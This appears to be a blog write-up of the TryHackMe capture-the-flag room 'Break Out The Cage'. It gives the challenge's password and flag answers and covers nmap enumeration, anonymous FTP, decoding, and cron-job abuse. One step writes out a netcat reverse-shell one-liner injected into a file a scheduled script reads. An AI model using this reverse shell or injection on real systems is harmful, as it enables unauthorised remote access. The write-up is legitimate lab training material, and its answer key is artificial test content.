thm-breakoutthecage1-nl

 Tasks

Let’s find out what his agent is up to….


#1 What is Weston’s password?
Mydadisghostrideraintthatcoolnocausehesonfirejokes
#2 What’s the user flag?
 THM{M37AL_0R_P3N_T35T1NG}
#3 What’s the root flag?
THM{8R1NG_D0WN_7H3_C493_L0N9_L1V3_M3}

Note: Try out the the room on https://tryhackme.com/room/breakoutthecage1

Lets get started 🙂


  • Start the enumeration “nmap -sC -sV -T4 <IP>”
E:\PENTEST>nmap -vv -sC -sV -T4 10.10.139.25
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-06 14:28 W. Europe Summer Time
NSE: Loaded 148 scripts for scanning.
Initiating Ping Scan at 14:28
Scanning 10.10.139.25 [4 ports]
Completed Ping Scan at 14:28, 2.56s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:28
Completed Parallel DNS resolution of 1 host. at 14:28, 0.01s elapsed
Initiating SYN Stealth Scan at 14:28
Scanning 10.10.139.25 [1000 ports]
Discovered open port 80/tcp on 10.10.139.25
Discovered open port 22/tcp on 10.10.139.25
Discovered open port 21/tcp on 10.10.139.25
Scanned at 2020-08-06 14:28:08 W. Europe Summer Time for 22s
Not shown: 997 closed ports
Reason: 997 resets
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 396 May 25 23:33 dad_tasks
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.11.3.122
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dd:fd:88:94:f8:c8:d1:1b:51:e3:7d:f8:1d:dd:82:3e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDn+KLEDP81/6ceCvdFeDrLFYWSWc6UnOmmpiNeXuyr+GRvE5Eff4DOeTbiEIcHQkkPcz2QXiOLd9SMjCEgAqmZiZE/mv1HJpQfmRLOufOlf9oZ1TIZf7ehKcVqX0W3nuQeC+M2wLBse2lGhovnTSaZKLKRjQCP2yD1EzND/xFA88oFpahvr6vJfyGOTADjc83AJq9n3Gnil4Nd88xNsIKTl01Mm9ikE/3n/XFbwzYa2bYJRVr+lWWRd+EU3sYTY80PQgBiw6ZPT0QCe0lQfmcgCqu4hC+t/kyfmMRlbtjN/yZJ0gCWeVVAV+A4NNgsOqFbXUT+c6ATzYNhBXRojJED
| 256 3e:ba:38:63:2b:8d:1c:68:13:d5:05:ba:7a:ae:d9:3b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBA3G1rdbZBOf44Cvz2YGtC5WhIHfHQhtShY8miCVHayvHM/9reA8VvLx9jBOa+iClhm/HairgvNV6pYV6Jg6MII=
| 256 c0:a6:a3:64:44:1e:cf:47:5f:85:f6:1f:78:4c:59:d8 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFiTPEbVpYmF2d/NDdhVYlXWA5PmTHhtrtlAaTiEuZOj
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Nicholas Cage Stories
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 24.05 seconds
Raw packets sent: 1004 (44.152KB) | Rcvd: 1001 (40.040KB)

E:\PENTEST>

We got port 80 open so went to the web and checked page source,network etc. but got nothing. Then I moved to the FTP port.

  • Connect to the FTP “ftp <IP>” use username and password as “anonymous”

And we are in now!

  • List the files and we got “dad_tasks” file, download it using “mget *”

Image for post

  • Open the file and it looks like base64 encoding, decode it using “strings dad_tasks | base64 -d”
  • Or use Python :
  • kali@kali:~/thm/python$ kali@kali:~/thm/python$ cat decode.py
    
    print open("FILE-WITH-STRING", "rb").read().decode("base64")
    
    kali@kali:~/thm/python$ cat FILE-WITH-STRING
    UHl0aG9uIGlzIGZ1bg==
    kali@kali:~/thm/python$ mv dad_tasks FILE-WITH-STRING
    kali@kali:~/thm/python$ python decode.py
    Qapw Eekcl - Pvr RMKP...XZW VWUR... TTI XEF... LAA ZRGQRO!!!!
    Sfw. Kajnmb xsi owuowge
    Faz. Tml fkfr qgseik ag oqeibx
    Eljwx. Xil bqi aiklbywqe
    Rsfv. Zwel vvm imel sumebt lqwdsfk
    Yejr. Tqenl Vsw svnt "urqsjetpwbn einyjamu" wf.
    
    Iz glww A ykftef.... Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl
    Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!!
    One. Revamp the website
    Two. Put more quotes in script
    Three. Buy bee pesticide
    Four. Help him with acting lessons
    Five. Teach Dad what "information security" is.
    
    In case I forget.... Mydadisghostrideraintthatcoolnocausehesonfirejokes

Image for post

Image for post

And you will get the password for #Task 1

Image for post

  • As the Task #1 said it’s the password for “weston”. So, now used it to log into the SSH. “ssh weston@<IP>” use the password which we got.

Image for post

  • Suddenly a popup came on the terminal which indicates some sort of cron job/file is running every 1–5mins and so.

Note: Download the pspy64 onto your local machine and then transfer it to box using “scp <Path for pspy file> weston@<ip>:/home/weston”

Also make it executable using “chmod +x pspy64” Then run “./pspy -pf -i 1000”

And we got some .py files which are running. (This will take some time)

 

  • View the .py file “ cat /opt/.dads_scripts/spread_the_quotes.py”

Image for post

Which is opening a file /opt/.dads_scripts/.files/.quotes

  • Add a netcat reverse shell into “.quotes” file using

echo “;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <Your IP> 1234 >/tmp/f” > .quotes

  • Start listening on your local machine using “nc -lvp 1234” and wait for 1–2 mins and you will get the connection.

Image for post

Note: Use the following command to move to terminal after getting reverse shell “ python -c ‘import pty; pty.spawn(“/bin/bash”)’ “

Now only thing is left to get Privilege Escalation for root!

We got 2 folders from user “cage” list the “email_backup” folder and read all the emails in it and again we got some gibberish text in “email_3″.

Image for post

I tried to decode it using the same site but it didn’t worked.

Read the email again and it seems the keyword to decode this was “FACE” decode it using CyberChef and we got the password for root!

Image for post

Move to the root directory and we get the file token for the challenge!!!

Author : Puckiestyle

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *